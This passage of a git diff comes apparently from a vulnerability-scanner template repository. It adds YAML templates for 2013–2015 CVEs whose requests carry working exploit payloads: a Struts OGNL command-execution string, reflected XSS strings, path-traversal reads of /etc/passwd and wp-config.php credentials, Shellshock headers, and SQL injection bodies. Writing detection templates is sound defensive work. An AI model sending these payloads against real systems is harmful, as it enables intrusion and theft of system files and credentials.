GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -38,10 +46,4 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
- type: word
|
||||
words:
|
||||
- "There is no Action mapped for namespace"
|
||||
- "The origin server did not find a current representation for the target resource"
|
||||
- "Apache Tomcat"
|
||||
condition: or
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2013-2287
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2013-3526
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2013-3827
|
||||
|
||||
info:
|
||||
name: Javafaces LFI
|
||||
author: Random-Robbie
|
||||
severity: medium
|
||||
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
|
||||
tags: cve,cve2013,lfi,javafaces,oracle
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
|
||||
- https://www.exploit-db.com/exploits/38802
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<web-app"
|
||||
- "</web-app>"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2013-4117
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2013-4625
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2013-5528
|
||||
|
||||
info:
|
||||
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
|
||||
reference: https://www.exploit-db.com/exploits/40887
|
||||
tags: cve,cve2013,lfi,cisco
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2013-7240
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/38936
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
- "DB_HOST"
|
||||
- "The base configurations of the WordPress"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-2321
|
||||
|
||||
info:
|
||||
name: ZTE Cable Modem Web Shell
|
||||
description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
|
||||
author: geeknik
|
||||
reference:
|
||||
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
|
||||
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
|
||||
severity: high
|
||||
tags: iot,cve,cve2014,zte
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web_shell_cmd.gch"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "please input shell command"
|
||||
- "ZTE Corporation. All rights reserved"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2014-2323
|
||||
|
||||
info:
|
||||
name: Lighttpd 1.4.34 SQL injection and path traversal
|
||||
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
|
||||
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
|
||||
author: geeknik
|
||||
severity: critical
|
||||
tags: cve,cve2014,sqli,lighttpd
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |+
|
||||
GET /etc/passwd HTTP/1.1
|
||||
Host: [::1]' UNION SELECT '/
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
@ -0,0 +1,32 @@
|
|||
id: arbitrary-file-read-in-dompdf
|
||||
|
||||
info:
|
||||
name: Arbitrary file read in dompdf < v0.6.0
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/33004
|
||||
tags: dompdf,lfi
|
||||
|
||||
# - "/dompdf.php?input_file=C:/windows/win.ini"
|
||||
# - "/dompdf.php?input_file=/etc/passwd"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
|
||||
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
|
||||
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
|
||||
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "application/pdf"
|
||||
- 'filename="dompdf_out.pdf"'
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-2962
|
||||
|
||||
info:
|
||||
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
|
||||
reference: https://www.exploit-db.com/exploits/38488
|
||||
tags: cve,cve2014,lfi,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,11 @@ info:
|
|||
name: ElasticSearch v1.1.1/1.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
|
||||
description: |
|
||||
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
|
||||
- https://www.elastic.co/blog/logstash-1-4-3-released
|
||||
tags: cve,cve2014,elastic,rce
|
||||
|
||||
requests:
|
||||
|
@ -45,7 +49,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2014-3704
|
||||
info:
|
||||
name: Drupal Sql Injetion
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
|
||||
reference: |
|
||||
- https://www.drupal.org/SA-CORE-2014-005
|
||||
- http://www.exploit-db.com/exploits/34984
|
||||
- http://www.exploit-db.com/exploits/34992
|
||||
- http://www.exploit-db.com/exploits/34993
|
||||
- http://www.exploit-db.com/exploits/35150
|
||||
tags: cve,cve2014,drupal,sqli
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/?q=node&destination=node"
|
||||
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "PDOException"
|
||||
- "e807f1fcf82d132f9bb018ca6738a19f"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-3744
|
||||
|
||||
info:
|
||||
name: Node.js st module Directory Traversal
|
||||
author: geeknik
|
||||
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
|
||||
reference: |
|
||||
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
|
||||
- https://snyk.io/vuln/npm:st:20140206
|
||||
severity: high
|
||||
tags: cve,cve2014,lfi,nodejs,st
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-4210
|
||||
|
||||
info:
|
||||
name: Weblogic SSRF in SearchPublicRegistries.jsp
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
tags: cve,cve2014,weblogic,oracle,ssrf
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
||||
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Connection refused"
|
||||
- "Socket Closed"
|
||||
- "content-type: unknown/unknown"
|
||||
part: body
|
||||
condition: or
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2014-4513
|
||||
|
||||
info:
|
||||
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
|
||||
tags: cve,cve2014,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</textarea></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-4535
|
||||
|
||||
info:
|
||||
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-4536
|
||||
|
||||
info:
|
||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-5368
|
||||
|
||||
info:
|
||||
name: WordPress Plugin WP Content Source Control - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/39287
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5368
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,6 +5,9 @@ info:
|
|||
author: pentest_swissky
|
||||
severity: high
|
||||
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
|
||||
reference: |
|
||||
- http://www.kb.cert.org/vuls/id/252743
|
||||
- http://www.us-cert.gov/ncas/alerts/TA14-268A
|
||||
tags: cve,cve2014,rce
|
||||
|
||||
requests:
|
||||
|
@ -17,6 +20,7 @@ requests:
|
|||
- "{{BaseURL}}/cgi-bin/status/status.cgi"
|
||||
- "{{BaseURL}}/test.cgi"
|
||||
- "{{BaseURL}}/debug.cgi"
|
||||
- "{{BaseURL}}/cgi-bin/test-cgi"
|
||||
headers:
|
||||
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
|
@ -28,5 +32,5 @@ requests:
|
|||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2014-6308
|
||||
|
||||
info:
|
||||
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-8799
|
||||
|
||||
info:
|
||||
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/35346
|
||||
- https://www.cvedetails.com/cve/CVE-2014-8799
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
- "DB_USER"
|
||||
- "DB_HOST"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-9094
|
||||
|
||||
info:
|
||||
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
||||
tags: cve,2014,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2015-1000012
|
||||
|
||||
info:
|
||||
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
severity: high
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,10 @@ info:
|
|||
name: ElasticSearch 1.4.0/1.4.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://blog.csdn.net/JiangBuLiu/article/details/94457980
|
||||
description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
|
||||
reference: |
|
||||
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
|
||||
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
|
||||
tags: cve,cve2015,elastic,rce
|
||||
|
||||
requests:
|
||||
|
@ -43,7 +46,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2015-1880
|
||||
|
||||
info:
|
||||
name: XSS in Fortigates SSL VPN login page
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
|
||||
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
|
||||
tags: cve,cve2015,xss,fortigates,ssl
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert('{{randstr}}')</script>"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -4,14 +4,18 @@ info:
|
|||
name: Eclipse Jetty Remote Leakage
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
|
||||
reference: |
|
||||
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
||||
